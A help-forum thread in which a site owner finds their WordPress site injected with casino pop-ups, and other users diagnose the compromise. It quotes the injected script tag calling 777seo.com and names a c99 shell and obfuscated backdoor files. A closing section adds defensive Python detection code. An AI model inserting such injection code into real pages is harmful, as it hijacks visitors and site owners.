Solved

wordpress web site plagued with pop ups

Posted on 2012-03-11
Last Modified: 2012-03-16
Hello

I have a web site hosted on www.1&1.co.uk using WordPress but recently have noticed when I go to the site it is plagued with casino page pop-up advertisements.

You go to the site and 4 other pages open up for casino games.

Is this a problem with the site on WordPress or with the domain name hosted with 1&1?

Desperately need some help with this issue.

Thank you
0
Question by:drzackzuss
10 Comments
 
LVL 8

Expert Comment

by:2toria
ID: 37707384
Hi there.

I'm not entirely sure what the problem might be without having a look at your website.  Are you able to post a link?

Have you any WordPress plugins installed on your site?  If so, can you list them?  It might be possible one of them is causing this issue.

Matt
0
 

Author Comment

by:drzackzuss
ID: 37708776
Hello

Yes, there are three plugins installed:

add logo to admin
formidable
options framework

Also, I have gone onto the web site using Firefox and used the "view page source" option and have found these lines of code at the very bottom:

</body>
</html><script language="javascript" src="http://www.777seo.com/pop.php?username=empixcrew&max=5"></script>
<noscript><a href="http://www.paid-to-promote.net/" target="_blank">Paid To Popup</a></noscript>

I imagine this is definitely what is causing the problem but not sure how I can go about removing it.

Thank you for any more help
0
 
LVL 83

Accepted Solution

by:
David Johnson, CD, MVP earned 1332 total points
ID: 37709062
Your site has been compromised. If you are using v3.2.1 of WordPress you should update it to the latest stable version and go through your site checking your code.

You might want to take a look at this: http://pastebin.com/JzQvZvyT. This hacking crew is very busy.

You might also want to look at this site http://community.websense.com/blogs/securitylabs/archive/2012/01/30/3_2D00_2_2D00_1-wordpress-vulnerability-leads-to-possible-new-exploit-kit.aspx which shows what to look for in your code.
0

 

Author Comment

by:drzackzuss
ID: 37711327
Hello

Thank you for your help.

Just to explain, I have access to edit the WordPress site but do not have access to the domain.

The code does not appear at all when looking through every file on WordPress but, as said, is clearly in the HTML for the site.

Would this be a case of contacting the guy who hosts the site and asking him to log on to the domain host and delete the offending code?

Will it just be the same HTML code as in the web page source but hosted on a server?  Is it a simple job to edit it out?
0
 
LVL 83

Expert Comment

by:David Johnson, CD, MVP
ID: 37711680
"just to explain i have access to edit the wordpress site but do not have access to the domain"

When you say you have access to edit but not access to the domain, does this mean that you can access the site through the WordPress editor but not directly access the site itself?  I.e. you do not have direct FTP/WebDAV access to the site?

You need to be able to go through every source file on the site, and every plugin and all of the script files.  If you have a backup of the site, then restoring from a backup is probably quicker.
0
 
LVL 1

Assisted Solution

by:Beyond_Hideki
Beyond_Hideki earned 668 total points
ID: 37724661
I am in the same situation as the OP. Thanks to Google I found this posting. I have now upgraded my WP version to the latest, which was 3.3.1; let's see if that's the issue.

I thought I was just "shelled" and that they did manual editing of my files so they could inject that certain code. At first, I thought it was a timthumb exploit, but since it happened to me again (which is what brought me here), it's not from there. I cannot find shells anymore in my files.

For others' sake, try checking out your wp-blog-header.php file. I saw the code there.
0
 
LVL 83

Assisted Solution

by:David Johnson, CD, MVP
David Johnson, CD, MVP earned 1332 total points
ID: 37727590
You're not alone. Hundreds of WordPress sites have been compromised this way daily.
0
 

Author Comment

by:drzackzuss
ID: 37728650
Hello

Thank you for your help.

I managed to get in contact with the guy who currently hosts the site and he has helped remove the code.

He seems to think it was a virus in a picture that was uploaded, but I think that he is just trying to cover his back as he is supposed to keep it all up to date.

Anyway, removing the code and updating WordPress to the latest version has stopped the pop-up ads.
0
 
LVL 83

Expert Comment

by:David Johnson, CD, MVP
ID: 37728731
It wasn't the picture; it was a vulnerability in WordPress. Twit.tv also got hit with the same problem. Check this page as this is still going on.
0
 
LVL 1

Expert Comment

by:Beyond_Hideki
ID: 37729339
I checked my site again today, but unfortunately, the script still gets injected, even though I had upgraded to the latest version of WP.

I then decided to check my file manager again and examine the WordPress files. You can also do so by using this link http://codex.wordpress.org/WordPress_Files as reference.

I noticed 2 files which are not really WP files. Namely:

wp-ok.php
wp-link.php

At first, I didn't think that these were such malicious PHP files. Checking what's inside them:
On wp-ok.php, it's a c99 shell.
On wp-link.php, it's an obfuscated PHP file that, when loaded, shows a password-protected page, just like the image attached.

wp-link.php when accessed directly.
I also found an unwanted cron job running on my server. It has a name of OneHeart.bot.chk. I deleted that job too because it had eaten up a lot of my hosting account's resources.

I am in the process of locating and removing all the possible malicious files or shells in my file manager. Though, the entry point of this exploit is still unclear to me.
0
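The checks described in this thread (files in the install that are not WordPress files, a core file such as wp-blog-header.php carrying extra code, and a script tag sitting after the closing </html>) can be automated; the following is an added example, not code from any participant in the thread. It assumes a clean copy of the same WordPress release has been unpacked next to the live files; the function names, the sample trees and the ads.example URL are constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def compare_to_clean(site_dir, clean_dir):
    """Return (extra, modified) PHP files, relative to a clean copy of the same release."""
    site, clean = Path(site_dir), Path(clean_dir)
    extra, modified = [], []
    for f in sorted(site.rglob("*.php")):
        rel = f.relative_to(site)
        # wp-content and wp-config.php are site-specific: review those by hand.
        if rel.parts[0] == "wp-content" or rel.name == "wp-config.php":
            continue
        ref = clean / rel
        if not ref.is_file():
            extra.append(str(rel))          # file that does not ship with WordPress
        elif sha256(f) != sha256(ref):
            modified.append(str(rel))       # core file whose content was changed
    return extra, modified

def scripts_after_html_close(html):
    """Return src URLs of <script> tags that appear after the closing </html>."""
    m = re.search(r"</html\s*>", html, re.IGNORECASE)
    tail = html[m.end():] if m else ""
    return re.findall(r"<script\b[^>]*\bsrc\s*=\s*[\"']([^\"']+)", tail, re.IGNORECASE)

def demo():
    """Build a constructed 'clean' and 'live' tree and compare them."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for root in (clean, live):
            (root / "wp-includes").mkdir(parents=True)
            (root / "index.php").write_text("<?php // front controller\n")
            (root / "wp-blog-header.php").write_text("<?php // loads WP\n")
            (root / "wp-includes" / "version.php").write_text("<?php // version\n")
        # Constructed tampering mirroring the thread: two extra files, one edited file.
        (live / "wp-ok.php").write_text("<?php // placeholder\n")
        (live / "wp-link.php").write_text("<?php // placeholder\n")
        with (live / "wp-blog-header.php").open("a") as fh:
            fh.write("echo '<!-- appended -->';\n")
        return compare_to_clean(live, clean)

if __name__ == "__main__":
    print(demo())
    print(scripts_after_html_close('</body>\n</html><script src="http://ads.example/pop.php"></script>'))
```

Anything reported as extra or modified should be inspected and then replaced from the clean copy; the comparison does not cover themes, plugins, uploads, the database or cron jobs, which need their own review.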
